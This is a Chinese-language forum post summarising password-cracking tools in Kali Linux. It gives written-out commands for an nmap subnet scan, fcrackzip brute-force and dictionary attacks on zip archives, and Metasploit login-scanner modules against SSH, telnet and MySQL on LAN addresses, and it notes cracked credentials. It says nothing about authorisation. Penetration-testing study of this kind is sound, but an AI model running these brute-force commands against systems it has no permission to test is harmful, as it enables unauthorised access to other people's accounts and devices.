kali 密码破解机汇总

admin · 发表于 2020-10-28 21:33:25

密码自古以来就是人类保护自己的一种方式。从锁 🔒的发明到摩斯电码、直到现在的各种加密算法。密码已经成为当代人生活中不可缺少又非常重要的一种工具，更或者说是一种人们的生活方式。而破解密码也已经成为大佬和 小学生 共同交流的话题！

kali密码破解机汇总

小学生三连问

密码破解前期的准备

常见名词解释

名词	释意
字典	即一些密码的集合，格式一般为 `txt`
暴力破解	一种破解方式，通过已知密码字典分别进行尝试，成功率和字典有关。
掩码破解	由于受到字典的限制无法破解成功，可用 `猜测`的方式破解。如 `?a?a?a?a` 代表 `4`位 `0~9`的密码（不同程序，表示方法可能不同。）但是对计算机的要求比较高

常见端口信息收集

端口	程序
21	`FTP`端口用于上传文件到服务器
22	`SSH` `SFTP`端口，用于登录服务器执行命令
3306	`mysql`端口（远程服务器需要账号授权）
3389	`Windwos远程登录`端口
5800	`VNC`端口相当于Windows的远程登录

判断端口是否开启

利用 nmap即可查看目标端口是否开启

nmap -T4 -A 192.168.1.1/24

扫描局域网内所有设备开启的相关端口，当然我们也可以中 msfconsole nessus等相关神器进行信息收集，但这里不再详讲！如下图这台 ASUS RT-N56U设备开启了 22 80等端口。局域网中一台设备端口情况

常见的破解方式

01压缩文件的暴力破解(zip rar )

使用fcrackzip破解zip压缩包

这是一款kali下字段的破解zip压缩包的工具。使用如下：破解ZIP加密文件

fcrackzip -b -l 6-6 -c 1 -p 000000 passwd.zip

-b 暴力破解
-c 1 限制密码是数字
-l 6-6 限制密码长度为6
-p 000000 初始化破解起点

如何使用字典破解呢

fcrackzip -D -p passwd passwd.zip

-D -p passwd 密码本passwd文件

当然，也可以参考我前面写过的一篇文章《利用python破解zip密码》

02破解ssh

我们可以利用 nmap msfconsole 等工具里面字典的模块进行破解。这里以 msfconsole为例：

use auxiliary/scanner/ssh/ssh_login
set PASS_FILE /root/zi.txt
set RHOSTS 192.168.123.1
set USERNAME admin
run

如下：密码和账号破解为 admin admin SSH

03telnet破解

Telnet协议是TCP/IP协议族中的一员，是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序，用它连接到服务器。 扫描目标是否开启相应端口

nmap -T4 -A 192.168.123.1 -p 23

结果如下： 23端口为远程登录端口

利用msfconsole中的相应模块进行破解

use auxiliary/scanner/telnet/telnet_login

破解效果如下：

04 mysql破解

MySQL是一个关系型数据库管理系统，MySQL 是最流行的关系型数据库管理系统之一，在 WEB 应用方面，MySQL是最好的 RDBMS 应用软件之一。

使用模块

use auxiliary/scanner/mysql/mysql_login

效果如下数据库 dede 的密码为 123456

远程登录测试

当然，我们利用其他的密码破解工具也是可以的，如hashcat john medusa这些神器都可以完成密码的破解，每个工具都有各自的优势和缺点，这里我也不详细说明了。有兴趣的可以去论坛查找相关的帖子学习哦！

kali 密码破解机汇总

密码破解前期的准备

常见名词解释

常见端口信息收集

判断端口是否开启

常见的破解方式

01压缩文件的暴力破解(zip rar )

02破解ssh

03telnet破解

04 mysql破解

相关帖子

热心会员

推广达人

宣传达人

突出贡献

优秀版主

荣誉管理

论坛元老